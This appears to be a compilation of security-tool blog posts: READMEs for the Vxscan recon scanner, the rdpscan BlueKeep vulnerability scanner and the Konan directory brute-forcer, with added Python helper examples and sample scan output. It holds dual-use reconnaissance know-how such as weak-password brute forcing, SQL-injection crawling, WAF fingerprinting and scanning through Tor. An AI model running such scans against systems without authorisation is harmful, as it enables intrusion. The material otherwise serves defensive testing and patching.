- Call nmap to identify the operating system fingerprint
- Call weak password detection scripts based on open ports (FTP/SSH/TELNET/Mysql/MSSQL…)
- Call POC scans based on fingerprint identification or port, or against the open web ports of an IP
- Analyze sensitive asset information (domain names, mailboxes, API keys, passwords, etc.) in JS files
- Crawl website links and test for SQL injection, LFI, etc.
- Call some online interfaces to obtain information from VT, www.yougetsignal.com and other websites: determine the real IP through VT pdns, and query reverse-IP results via www.yougetsignal.com and api.hackertarget.com.

Usage
python3 Vxscan.py -h

optional arguments:
  -h, --help                     show this help message and exit
  -u URL, --url URL              Start scanning this url -u xxx.com
  -i INET, --inet INET           cidr eg. or
  -f FILE, --file FILE           read the url from the file
  -t THREADS, --threads THREADS  Set scan thread, default 150
  -e EXT, --ext EXT              Set scan suffix, -e php,asp
  -w WORD, --word WORD           Read the dict from the file

1. Scan a website
python3 vxscan.py -u http://www.xxx.com/
2. Scan a website from a file list
python3 vxscan.py -f hosts.txt
3. cidr eg. or
vxscan.py -i
4. Set thread 100, combine only the php suffix, use a custom dictionary
python3 vxscan.py -u http://www.xxx.com -e php -t 100 -w ../dict.txt

Structure
/
├─Vxscan.py             main file
├─db
│  ├─apps.json          Web fingerprint information
│  ├─apps.txt           Web fingerprint information (WEBEYE)
│  ├─password.txt       password
├─report                Report directory
├─lib
│  ├─common.py          Determine CDN, port scan, POC scan, etc.
│  ├─color.py           Terminal color output
│  ├─active.py          Judge dns parsing and ping ip survival
│  ├─save_html.py       Generate html report
│  ├─waf.py             waf rules
│  ├─osdetect.py        Operating system version identification
│  ├─random_header.py   random header
│  ├─scan_port.py       PortScan
│  ├─jsparse.py         Grab the website js connection, analyze ip address, link, email, etc.
│  ├─settings.py        Setting
│  ├─pyh.py             Generate html
│  ├─wappalyzer.py      Fingerprint recognition script
│  ├─sql_injection.py   Grab the website connection and test the SQL injection script
├─script
│  ├─Poc.py             Poc script
│  ├─……
├─requirements.txt
├─logo.jpg
├─error.log

Waf/CDN list
360, 360wzws, Anquanbao, Armor, BaiduYunjiasu, AWS WAF, AdNovum, Airee CDN, Art of Defence HyperGuard, ArvanCloud, Barracuda NG, Beluga CDN, BinarySEC, BlockDoS, Bluedon IST, CacheFly CDN, ChinaCache CDN, Cisco ACE XML Gateway, CloudFlare CDN, Cloudfront CDN, Comodo, CompState, DenyALL WAF, DenyAll, Distil Firewall, DoSArrest Internet Security, F5 BIG-IP APM, F5 BIG-IP ASM, F5-TrafficShield, Fastly CDN, FortiWeb, FortiWeb Firewall, GoDaddy, GreyWizard Firewall, HuaweiCloudWAF, HyperGuard Firewall, IBM DataPower, ISAServer, Immunify360, Imperva SecureSphere, Incapsula CDN, Jiasule, KONA, KeyCDN, ModSecurity, NGENIX CDN, NSFOCUS, Naxsi, NetContinuum, NetContinuum WAF, Neusoft SEnginx, Newdefend, Palo Alto Firewall, PerimeterX Firewall, PowerCDN, Profense, Qiniu CDN, Reblaze Firewall, SDWAF, Safe3, Safedog, SiteLock TrueShield, SonicWALL, SonicWall, Sophos UTM Firewall, Stingray, Sucuri, Teros WAF, Usp-Sec, Varnish, Wallarm, WatchGuard, WebKnight, West263CDN, Yundun, Yunsuo, ZenEdge Firewall, aesecure, aliyun, azion CDN, cloudflare CDN, dotDefender, limelight CDN, maxcdn CDN, mod_security, yunsuo

Output
The following are the results for the AWVS scanner test website (testphp.vulnweb.com):

[
  {
    "testphp.vulnweb.com": {
      "WAF": "NoWAF",
      "Webinfo": {
        "apps": ["Nginx", "PHP", "DreamWeaver", "php"],
        "title": "Home of Acunetix Art",
        "server": "nginx/1.4.1",
        "pdns": [" : 2019-06-09 02:05:52"],
        "reverseip": ["", "rs202995.rs.hosteurope.de", "testhtml5.vulnweb.com", "testphp.ingensec.ch", "testphp.ingensec.com", "testphp.ingensec.fr", "testphp.vulnweb.com", "vulnweb.com", "www.vulnweb.com"]
      },
      "Ports": ["IMAPS:993", "ssh:22", "imap:143", "http:80", "Unknown:8880", "pop:110", "POP3:995", "smtp:25", "Unknown:8443", "SMTPS:465", "DNS:53", "ftp:21"],
      "Ipaddr": "",
      "Address": "德国 ",
      "Vuln": [
        "http://testphp.vulnweb.com | Home of Acunetix Art",
        "MySQL SQLi:http://testphp.vulnweb.com/search.php?test=query",
        "MySQL SQLi:http://testphp.vulnweb.com/artists.php?artist=1",
        "MySQL SQLi:http://testphp.vulnweb.com/listproducts.php?cat=2"
      ],
      "URLS": [
        {"rsp_code": 200, "rsp_len": 12473, "title": "None", "contype": "xml", "url": "/.idea/workspace.xml"},
        {"rsp_code": 200, "rsp_len": 1, "title": "None", "contype": "plain", "url": "/CVS/Root"},
        {"rsp_code": 200, "rsp_len": 4732, "title": "search", "contype": "html", "url": "/search.php"},
        {"rsp_code": 200, "rsp_len": 1, "title": "None", "contype": "plain", "url": "/CVS/Entries"},
        {"rsp_code": 200, "rsp_len": 3265, "title": "Home of WASP Art", "contype": "plain", "url": "/index.bak"},
        {"rsp_code": 200, "rsp_len": 143, "title": "None", "contype": "xml", "url": "/.idea/scopes/scope_settings.xml"},
        {"rsp_code": 200, "rsp_len": 3265, "title": "Home of WASP Art", "contype": "zip", "url": "/index.zip"},
        {"rsp_code": 200, "rsp_len": 275, "title": "None", "contype": "xml", "url": "/.idea/modules.xml"},
        {"rsp_code": 200, "rsp_len": 5523, "title": "login page", "contype": "html", "url": "/login.php"},
        {"rsp_code": 200, "rsp_len": 278, "title": "Index of /admin/", "contype": "html", "url": "/admin/"},
        {"rsp_code": 200, "rsp_len": 224, "title": "None", "contype": "xml", "url": "/crossdomain.xml"},
        {"rsp_code": 302, "rsp_len": 14, "title": "None", "contype": "html", "url": "/userinfo.php"},
        {"rsp_code": 200, "rsp_len": 6, "title": "None", "contype": "plain", "url": "/.idea/.name"},
        {"rsp_code": 200, "rsp_len": 4958, "title": "Home of Acunetix Art", "contype": "html", "url": "/index.php"}
      ]
    }
  }
]

Note
- Design ideas referenced from cnnetarmy Srchunter
- Weak password module referenced from brut3k1t: https://github.com/ex0dus-0x/brut3k1t
- Fingerprint recognition mainly calls Wappalyzer and WebEye: https://github.com/b4ubles/python3-Wappalyzer, https://github.com/zerokeeper/WebEye
- POCs referenced from: BBscan scanner https://github.com/lijiejie/BBScan, POC-T https://github.com/Xyntax/POC-T/tree/2.0/script, Perun https://github.com/WyAtu/Perun
- Port scan and service detection referenced from anthx: https://raw.githubusercontent.com/AnthraX1/InsightScan/master/scanner.py
- Injection crawler referenced from DSSS: https://github.com/stamparm/DSSS
- JS sensitive information regex extraction referenced from: https://github.com/nsonaniya2010/SubDomainizer
- WAF detection uses the wafw00f and WhatWaf judgment rules: https://github.com/EnableSecurity/wafw00f, https://github.com/Ekultek/WhatWaf
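The custom-404 recognition described in the feature list above (request random non-existent paths, then compare later responses against them with difflib) is worth seeing in working form, because a directory scanner that skips this step reports every path as "found" on servers that answer 200 to everything. The following is an added example, not Vxscan's own code; the HTTP bodies are constructed samples, `fake_fetch` stands in for a real HTTP client, and the 0.85 similarity threshold is an assumption, not a value taken from Vxscan.

```python
"""Added example (not Vxscan's own code): soft-404 detection via difflib.
A detector first requests a few random, non-existent paths and keeps their
bodies as a baseline; a later "200 OK" whose body is near-identical to that
baseline is classified as the site's custom error page, not as content."""
import difflib
import random
import string


def random_path(length=12):
    """Return a path that is vanishingly unlikely to exist on the target."""
    alphabet = string.ascii_lowercase + string.digits
    return "/" + "".join(random.choice(alphabet) for _ in range(length))


def similarity(a, b):
    """Ratio in [0, 1] of how alike two response bodies are (1.0 = identical)."""
    return difflib.SequenceMatcher(None, a, b).ratio()


class Soft404Detector:
    """Learns what the target returns for non-existent paths, then classifies."""

    # 0.85 is an assumed cut-off; error pages differ only in the echoed path,
    # so they score well above it, while real content scores far below.
    def __init__(self, fetch, probes=3, threshold=0.85):
        self.fetch = fetch          # fetch(path) -> (status_code, body)
        self.threshold = threshold
        self.baseline = []
        for _ in range(probes):
            status, body = fetch(random_path())
            # a genuine 404 needs no baseline; only "successful" errors
            # (200, or a custom 302 landing page) need to be learned
            if status in (200, 302):
                self.baseline.append(body)

    def is_custom_404(self, body):
        """True if body looks like the target's error page rather than content."""
        return any(similarity(body, b) >= self.threshold for b in self.baseline)

    def classify(self, path):
        status, body = self.fetch(path)
        if status == 404:
            return "missing"
        if self.is_custom_404(body):
            return "soft-404"
        return "found"


# Constructed target that answers 200 to everything, as many frameworks do.
ERROR_TEMPLATE = ("<html><head><title>Oops</title></head><body>"
                  "<h1>Page not found</h1><p>The page {path} does not exist.</p>"
                  "<footer>Example Corp</footer></body></html>")
REAL_PAGES = {
    "/login.php": "<html><head><title>login page</title></head><body>"
                  "<form method=post><input name=user><input name=pass>"
                  "</form></body></html>",
}


def fake_fetch(path):
    """Stand-in for an HTTP client: real pages return content, others the error page."""
    if path in REAL_PAGES:
        return 200, REAL_PAGES[path]
    return 200, ERROR_TEMPLATE.format(path=path)


def scan(paths, fetch=fake_fetch):
    """Return {path: verdict} for a wordlist, with soft-404 noise filtered out."""
    detector = Soft404Detector(fetch)
    return {p: detector.classify(p) for p in paths}


if __name__ == "__main__":
    for path, verdict in scan(["/login.php", "/admin/", "/backup.zip"]).items():
        print(f"{path:12s} {verdict}")
```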

Link: http://feedproxy.google.com/~r/PentestTools/~3/0ZDcFApPJl8/vxscan-comprehensive-scanning-tool.html

Rdpscan – A Quick Scanner For The CVE-2019-0708 “BlueKeep” Vulnerability

This is a quick-and-dirty scanner for the CVE-2019-0708 vulnerability in Microsoft Remote Desktop. Right now, there are about 900,000 machines on the public Internet vulnerable to this vulnerability, so many are to expect a worm soon like WannaCry and notPetya. Therefore, scan your networks and patch (or at least, enable NLA) on vulnerable systems.This is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above.This tool is based entirely on the rdesktop patch from https://github.com/zerosum0x0/CVE-2019-0708.Primary useTo scan a network, run it like the following:rdpscan produces one of 3 results for each address:SAFE – if target has determined bot be patched or at least require CredSSP/NLAVULNERABLE – if the target has been confirmed to be vulnerableUNKNOWN – if the target doesn’t respond or has some protocol failureWhen nothing exists at a target IP address, the older versions pritned the message “UNKNOWN – connection timed out". When scanning large networks, this produces an overload of too much information about systems you don’t care about. 
Therefore, the new version by default doesn’t produce this information unless you add -v (for verbose) on the command-line.You can increase the speed at which it scans large networks by increasing the number of workers:rdpscan –workers 10000, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter.You can increase the speed even more by using this in conjunction with masscan, described in the second below.Interpreting the resultsThere are three general responses:SAFE – which means the target is probably patched or otherwise not vulnerable to the bug.VULNERABLE: which means we’ve confirmed the target is vulnerable to this bug, and that when the worm hits, will likely get infected.UNKNOWN: means we can’t confirm either way, usually because the target doesn’t respond or isn’t running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we’ll get a lot of these. Finally, protocol errors are responsble for a lot. While the three main responses are SAFE, VULNERABLE, and UNKNOWN, they contain additional text explaining the diagnosis. This section describes the various strings you’ll see.SAFEThere are three main reaons we think a target is safe:SAFE – Target appears patched This happens when the target doesn’t respond to the triggering request. This means it’s a Windows system that’s been patched, or a system that wasn’t vulnerable to begin with, like Windows 10 or Unix.SAFE – CredSSP/NLA required This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point, without leigitimate credentials, so cannot determine whether the target has been patched. However, hackers can’t continue past this point to exploit vulnerable systems, either, so you are likely "safe". 
However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it’s un-patched.SAFE – not RDP This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that’s clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as UNKNOWN instead of SAFE/VULNERABLEThis means we’ve confirmed the system is vulnerable to the bug.VULNERABLE – got appid There is only one response when the system is vulnerable, this one.UNKNOWNThere are a zillion variations for unknownUNKNOWN – no connection – timeout This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it’s so common that when scanning large ranges of addresses, it’s usually ommited. You have to add the -v (verbose) flag in order to enable it.UNKNOWN – no connection – refused (RST) This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn’t running RDP, so refuses the connection with a TCP RST packet.UNKNOWN – RDP protocol error – receive timeout This is the third most common response, and happens when we’ve successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections.UNKNOWN – no connection – connection closed This means we’ve established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). 
There are many reasons this happens, which we cannot distinguish:
- It's running RDP, but for some reason closes the connection, possibly because it's out of resources.
- It's not RDP, and doesn't like the RDP request we send it, so instead of sending us a nice error message (which would trigger SAFE - not RDP), it abruptly closes the connection.
- Some intervening device, like an IPS, firewall, or NAT, closed the connection because it identified this as hostile, or ran out of resources.
- Some other reason I haven't identified; there's a lot of weird stuff happening when I scan the Internet.

UNKNOWN - no connection - host unreachable (ICMP error)
The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive.

UNKNOWN - no connection - network unreachable (ICMP error)
There is a (transient) network error on the far end; try again later if you believe that network should be running.

UNKNOWN - RDP protocol error
This means some corruption happened in the RDP protocol, either because the remote side implements it wrong (not a Windows system), because it's handling a transient network error badly, or something else.

UNKNOWN - SSL protocol error
Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has its own problems like those above, which include handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it's because the other side has a bug in SSL, or the SSL library you are using has a bug.

Using with masscan
This rdpscan tool is fairly slow, only scanning a few hundred targets per second. You can instead use masscan to speed things up. The masscan tool is roughly 1000 times faster, but only gives limited information on the target. The steps are:
1. First, scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use).
2. Second, feed the output of masscan into rdpscan, so it only has to scan targets we know are active.

The simple way to run this is just to combine them on the command-line:
masscan -p3389 | rdpscan --file -

The way I do it is in two steps:
masscan -p3389 > ips.txt
rdpscan --file ips.txt --workers 10000 > results.txt

Building
The difficult part is getting the OpenSSL libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I've tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL.
$ sudo apt install libssl-dev
$ sudo yum install openssl-devel

Once you've solved that problem, you just compile all the .c files together like this:
$ gcc *.c -lssl -lcrypto -o rdpscan

I've put a Makefile in the directory that does this, so you can likely do just:
$ make

The code is written in C, so it needs a C compiler installed, such as by doing the following:
$ sudo apt install build-essential

Common build errors
This section describes the more obvious build errors.

ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directory

This means you either don't have the OpenSSL headers installed, or they aren't in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn't mean you've got the development stuff installed. You need both the headers and libraries installed. To install these things on Debian, do:
$ sudo apt install libssl-dev

To fix the path issue, add a compilation flag -I/usr/local/include, or something similar.

An example linker problem is the following:
Undefined symbols for architecture x86_64:
  "_OPENSSL_init_ssl", referenced from: _tcp_tls_connect in tcp-fac73c.o
  "_RSA_get0_key", referenced from: _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o
  "_SSL_CTX_set_options", referenced from: _tcp_tls_connect in tcp-fac73c.o
  "_X509_get_X509_PUBKEY", referenced from: _rdssl_cert_to_rkey in ssl-d5fdf5.o

I get this on macOS because there are multiple versions of OpenSSL. I fix this by hard-coding the paths:
$ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscan

According to comments by others, the following command-line might work on macOS if you've used Homebrew to install things. I still get the linking errors above, though, because I've installed other OpenSSL components that are conflicting.
gcc $(brew --prefix)/opt/openssl/lib/libssl.a $(brew --prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.c

Running
The section above gives quickstart tips for running the program. This section gives more in-depth help.

To scan a single target, just pass the address of the target:
./rdpscan

You can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be:
./rdpscan exchange.example.com 2001:0db8:85a3::1

You can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren't supported because they are so big.
./rdpscan

By default, it scans only 100 targets at a time. You can increase this number with the --workers parameter. However, no matter how high you set this parameter, in practice you'll get a max of around 500 to 1500 workers running at once, depending upon your system.
./rdpscan --workers 1000

Instead of specifying targets on the command-line, you can load them from a file, using the well-named --file parameter:
./rdpscan --file ips.txt

The format of the file is one address, name, or range per line. It can also consume the text generated by masscan. Extra whitespace is trimmed, blank lines are ignored, and any comment lines are ignored. A comment is a line starting with the # character, or // characters.

The output is sent to stdout giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above.
 - SAFE - CredSSP/NLA required
185.11.124.79 - SAFE - not RDP - SSH response seen
125.121.137.42 - UNKNOWN - no connection - refused (RST)
 - SAFE - CredSSP/NLA required
121.204.186.182 - SAFE - CredSSP/NLA required
99.8.11.148 - SAFE - CredSSP/NLA required
121.204.186.114 - SAFE - CredSSP/NLA required
49.50.145.236 - SAFE - CredSSP/NLA required
106.12.74.155 - VULNERABLE - got appid
222.84.253.26 - SAFE - CredSSP/NLA required
144.35.133.109 - UNKNOWN - RDP protocol error - receive timeout
199.212.226.196 - UNKNOWN - RDP protocol error - receive timeout
183.134.58.152 - UNKNOWN - no connection - refused (RST)
 - VULNERABLE - got appid

You can process this with additional unix commands like grep and cut. To get a list of just vulnerable machines:
./rdpscan | grep 'VULN' | cut -f1 -d'-'

The parameter -dddd means diagnostic information, where the more ds you add, the more details are printed. This is sent to stderr instead of stdout so that you can separate the streams.
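The grep/cut pipeline above only recovers the first field; the reason text after the status can itself contain " - " (for example "no connection - refused (RST)"). The following is an added example, not part of rdpscan, that parses the "<target> - <STATUS> - <reason>" lines into a triage summary and writes the transient UNKNOWN results back out in the --file format for a later rescan; the sample results are constructed, not taken from a real run.

```python
import re
from collections import Counter

# Constructed sample of rdpscan stdout (not output from the page's own run).
# The tool prints "<target> - <STATUS> - <reason>"; a reason may itself contain
# " - ", so the README's cut pipeline is only safe for the first field.
SAMPLE_RESULTS = """\
192.0.2.10 - SAFE - CredSSP/NLA required
192.0.2.11 - SAFE - not RDP - SSH response seen
192.0.2.12 - UNKNOWN - no connection - refused (RST)
192.0.2.13 - VULNERABLE - got appid
192.0.2.14 - UNKNOWN - RDP protocol error - receive timeout
192.0.2.15 - UNKNOWN - no connection - host unreachable (ICMP error)

2001:db8::1 - VULNERABLE - got appid
"""

LINE_RE = re.compile(
    r"^(?P<target>\S+)\s+-\s+(?P<status>VULNERABLE|SAFE|UNKNOWN)"
    r"(?:\s+-\s+(?P<reason>.*))?$"
)

def parse_results(text):
    """Return [(target, status, reason)]; blank or unparseable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["target"], m["status"], m["reason"] or ""))
    return rows

def summarize(text):
    """Counts per status and per UNKNOWN reason, plus the VULNERABLE targets."""
    rows = parse_results(text)
    return {
        "by_status": dict(Counter(s for _, s, _ in rows)),
        "unknown_reasons": dict(Counter(r for _, s, r in rows if s == "UNKNOWN")),
        "vulnerable": [t for t, s, _ in rows if s == "VULNERABLE"],
    }

# The README says these UNKNOWN reasons are transient: try those targets again later.
RETRY_PREFIXES = ("no connection - host unreachable", "no connection - network unreachable")

def rescan_file(text):
    """Contents of a --file list (one target per line, '#' comments allowed)
    holding only the UNKNOWN targets worth a second pass."""
    targets = [t for t, s, r in parse_results(text)
               if s == "UNKNOWN" and r.startswith(RETRY_PREFIXES)]
    return "# rdpscan rescan list (transient errors)\n" + "".join(t + "\n" for t in targets)
```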
Using bash this is done like this:
./rdpscan --file myips.txt -ddd 2> diag.txt 1> results.txt

Diagnostic info
Adding the -d parameter dumps diagnostic info on the connections to stderr.
./rdpscan -d
[+] []:3389 - connecting...
[+] []:3389 - connected from []:49211
[+] []:3389 - SSL connection
[+] []:3389 - version = v4.8
[+] []:3389 - Sending MS_T120 check packet
[-] []:3389 - Max sends reached, waiting...
 - SAFE - Target appears patched

On macOS/Linux, you can redirect stdout and stderr separately to different files in the usual manner:
./rdpscan --file ips.txt 2> diag.txt 1> results.txt

SOCKS5 and Tor lulz
So it includes SOCKS5 support:
./rdpscan --file ips.txt --socks5 localhost --socks5port 9050
It makes connection problems worse, so you get a lot more "UNKNOWN" results.

Statically link OpenSSL
For releasing the Windows and macOS binaries attached as releases to this project I statically link OpenSSL, so that it doesn't need to be included separately, and the programs just work. This section describes some notes on how to do this, especially since the description on OpenSSL's own page seems to be out of date.

Both these steps start with downloading the OpenSSL source and putting it next to the rdpscan directory:
git clone https://github.com/openssl/openssl

Windows
For Windows, you need to first install some version of Perl. I use the one from ActiveState.
Next, you'll need a special "assembler". I use the recommended one called NASM.
Next, you'll need a compiler. I use Visual Studio 2010. You can download the latest "Visual Studio Community Edition" (which is 2019) instead from Microsoft.
Now you need to build the makefile. This is done by going into the OpenSSL directory and running the Configure Perl program:
perl Configure VC-WIN32

I chose 32-bit for Windows because there's a lot of old Windows out there, and I want to make the program as compatible as possible with old versions.
I want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from /MD (meaning use DLLs) to /MT. While I was there, I added the following to the CPPFLAGS: -D_WIN32_WINNT=0x501, which restricts OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that bcrypt.dll was not found if you run on those older systems.
Now you'll need to make sure everything is in your path. I copied nasm.exe to a directory in the PATH. For Visual Studio 2010, I ran the program vcvars32.bat to set up the path variables for the compiler.
At this point on the command-line, I typed:
nmake
This makes the libraries. The static ones are libssl_static.lib and libcrypto_static.lib, which I use to link to in rdpscan.

macOS
First of all, you need to install a compiler. I use the Developer Tools from Apple, installing XCode and the compiler. I think you can use Homebrew to install gcc instead.
Then go into the source directory for OpenSSL and create a makefile:
perl Configure darwin64-x86_64-cc
Now simply make it:
make depend
make
At this point, it's created both dynamic (.dylib) and static (.lib) libraries. I deleted the dynamic libraries so that it'll catch the static ones by default.
Now in rdpscan, just build the macOS makefile:
make -f Makefile.macos
This will compile all the rdpscan source files, then link to the OpenSSL libraries in the directory ../openssl that you just built.
This should produce a 3-megabyte executable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead.
Download Rdpscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/mCI0mRVoYKo/rdpscan-quick-scanner-for-cve-2019-0708.html

Konan – Advanced Web Application Dir Scanner

Konan is an advanced open source tool designed to brute force directory and file names on web/application servers.

Installation
Download Konan by cloning the Git repository:
git clone https://github.com/m4ll0k/Konan.git konan
Install requirements with pip:
cd konan && pip install -r requirements.txt
Run Konan:
python konan.py

Supported Platforms
Linux
Windows
MacOSX

Features
Feature                                  Konan                dirsearch            dirb        gobuster
MultiThreaded                            yes                  yes                  yes         yes
Multiple Extensions                      yes                  yes                  no          no
HTTP Proxy Support                       yes                  yes                  yes         yes
Reporting                                yes (text and json)  yes (text and json)  yes (text)  no
User-Agent randomization                 yes                  yes                  no          no
Ignore word in wordlist using regexp     yes                  no                   no          no
Split extension in wordlist              yes                  no                   no          no
Multiple Methods                         yes                  no                   no          no
Response Size Process                    yes                  no                   no          no
Provide Sub-Dir for Brute Force          yes                  no                   no          no
Provide Dir for Recursively Brute Force  yes                  no                   no          no
URL Injection Point                      yes                  no                   no          no

Usage
Basic:
python konan.py -u/--url http://example.com/

URL: http://testphp.vulnweb.com/
PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 01:32:50 - 200 - GET - 4958 - http://testphp.vulnweb.com/index.php
0.43% - 01:32:52 - 200 - GET - 4732 - http://testphp.vulnweb.com/search.php
0.54% - 01:32:57 - 200 - GET - 5523 - http://testphp.vulnweb.com/login.php
0.81% - 01:33:12 - 200 - GET - 4830 - http://testphp.vulnweb.com/logout.php
8.77% - 01:40:02 - 302 - GET - 14 - http://testphp.vulnweb.com/userinfo.php -> login.php

Injection Point:
python konan.py -u/--url http://example.com/%%/index.php

URL: http://testphp.vulnweb.com/%%/index.php
PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 01:32:50 - 200 - GET - 4958 - http://testphp.vulnweb.com/test/index.php
0.43% - 01:32:52 - 200 - GET - 4732 - http://testphp.vulnweb.com/search/index.php

python konan.py -u/--url http://example.com/test%% -w /root/numbers.txt

URL: http://testphp.vulnweb.com/test%%
PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 01:32:50 - 200 - GET - 4958 - http://testphp.vulnweb.com/test12
0.43% - 01:32:52 - 200 - GET - 4732 - http://testphp.vulnweb.com/test34

Provide a wordlist (default /db/dict.txt):
python konan.py -u/--url http://example.com/ -w/--wordlist /root/dict.txt

Provide extensions with the -f/--force option:
python konan.py -u/--url http://example.com/ -e/--extension php,html -f/--force

URL: http://testphp.vulnweb.com/
PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 02:00:21 - 200 - GET - 4958 - http://testphp.vulnweb.com/index.html
0.43% - 02:00:23 - 200 - GET - 4732 - http://testphp.vulnweb.com/search.php
0.54% - 02:00:30 - 200 - GET - 5523 - http://testphp.vulnweb.com/login.php
0.81% - 02:00:46 - 200 - GET - 4830 - http://testphp.vulnweb.com/logout.html
0.87% - 02:00:50 - 200 - GET - 6115 - http://testphp.vulnweb.com/categories.html

Provide status code exclusion:
python konan.py -u/--url http://example.com/ -x/--exclude 400,403,401

Provide only status codes for output:
python konan.py -u/--url http://example.com/ -o/--only 200,301,302

Wordlist lowercase (isATest -> isatest) and uppercase (isAtest -> ISATEST):
python konan.py -u/--url http://example.com/ -w/--wordlist /root/dict.txt [-l/--lowercase OR -p/--uppercase]

Wordlist split (test.php -> test):
python konan.py -u/--url http://example.com/ -w/--wordlist /root/dict.txt -s/--split

Wordlist: ignore words, letters, numbers, etc. matched by a regexp (e.g. \w*.php|\w*.html, ^[0-9_-]+):
python konan.py -u/--url http://example.com/ -w/--wordlist -I/--ignore "\?+"

Output without the -I/--ignore option:
URL: http://testphp.vulnweb.com/
PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 02:06:31 - 200 - GET - 4958 - http://testphp.vulnweb.com/???.php
0.43% - 02:06:32 - 200 - GET - 4732 - http://testphp.vulnweb.com/???????????
0.54% - 02:06:35 - 200 - GET - 5523 - http://testphp.vulnweb.com/admin/

Output with the -I/--ignore option (in this case \?+):
URL: http://testphp.vulnweb.com/
PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.54% - 02:06:35 - 200 - GET - 5523 - http://testphp.vulnweb.com/admin/

Recursive:
python konan.py -u/--url http://example.com/ -E/--recursive

Recurse into directories found and into directories provided by -D/--dir-rec:
python konan.py -u/--url http://example.com/ -E/--recursive -D/--dir-rec "admin,tests,dev,internal"

Brute force directories provided by -S/--sub-dir:
python konan.py -u/--url http://example.com/ -S/--sub-dir "admin,test,internal,dev"

Multiple Methods (check GET, POST, PUT and DELETE for each word entry):
Note: many web applications return a 404 code if the request is not made with the right method; this option tests all methods.
python konan.py -u/--url http://example.com/ -m/--methods

Content size process (show the response only if the response size is ">[number]", "<[number]" or "=[number]"):
python konan.py -u/--url http://example.com/ -C/--lenght "<1000"

URL: http://testphp.vulnweb.com/
PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.19% - 02:11:46 - 301 - GET - 184 - http://testphp.vulnweb.com/admin -> http://testphp.vulnweb.com/admin/
1.73% - 02:12:37 - 301 - GET - 184 - http://testphp.vulnweb.com/images -> http://testphp.vulnweb.com/images/

Download Konan
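The wordlist options (-s/--split, -l/-p, -I/--ignore, -e/--extension), the %% injection point and the -C/--lenght size expression described above are plain string processing. The following is an added example that re-implements them from the README's descriptions; it is not Konan's own code, the order in which the transformations are applied is an assumption, and the sample wordlist is constructed.

```python
import re

# Constructed sample wordlist (not Konan's /db/dict.txt) covering the cases the
# README's options describe: an extension to split off, mixed case, junk entries
# that an -I/--ignore regexp should drop, and a duplicate.
SAMPLE_WORDS = ["index.php", "isATest", "???.php", "admin", "123_", "search.html", "admin"]

def prepare_words(words, split=False, lowercase=False, uppercase=False, ignore=None, extensions=()):
    """Apply -I/--ignore, -s/--split, -l/-p and -e/--extension to a wordlist.
    Assumed order (not taken from Konan): ignore, then split, then case, then extensions."""
    ignore_re = re.compile(ignore) if ignore else None
    out = []
    for w in words:
        w = w.strip()
        if not w or (ignore_re and ignore_re.search(w)):
            continue
        if split and "." in w:           # test.php -> test
            w = w.rsplit(".", 1)[0]
        if lowercase:
            w = w.lower()
        elif uppercase:
            w = w.upper()
        out.append(w)
        for ext in extensions:           # -e php,html yields word.php and word.html
            out.append(f"{w}.{ext}")
    return list(dict.fromkeys(out))      # drop duplicates, keep order

def build_url(url, word):
    """%% injection point: substitute the word there; without one, append it to the path."""
    if "%%" in url:
        return url.replace("%%", word)
    return url.rstrip("/") + "/" + word

def size_filter(expr):
    """Turn a -C/--lenght expression such as '<1000', '>500' or '=184' into a predicate."""
    m = re.fullmatch(r"\s*([<>=])\s*(\d+)\s*", expr)
    if not m:
        raise ValueError(f"bad size expression: {expr!r}")
    op, n = m.group(1), int(m.group(2))
    return {"<": lambda size: size < n, ">": lambda size: size > n, "=": lambda size: size == n}[op]
```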

Link: http://feedproxy.google.com/~r/PentestTools/~3/00MhPW6Sun0/konan-advanced-web-application-dir.html

PhoneInfoga – Advanced Information Gathering & OSINT Tool For Phone Numbers

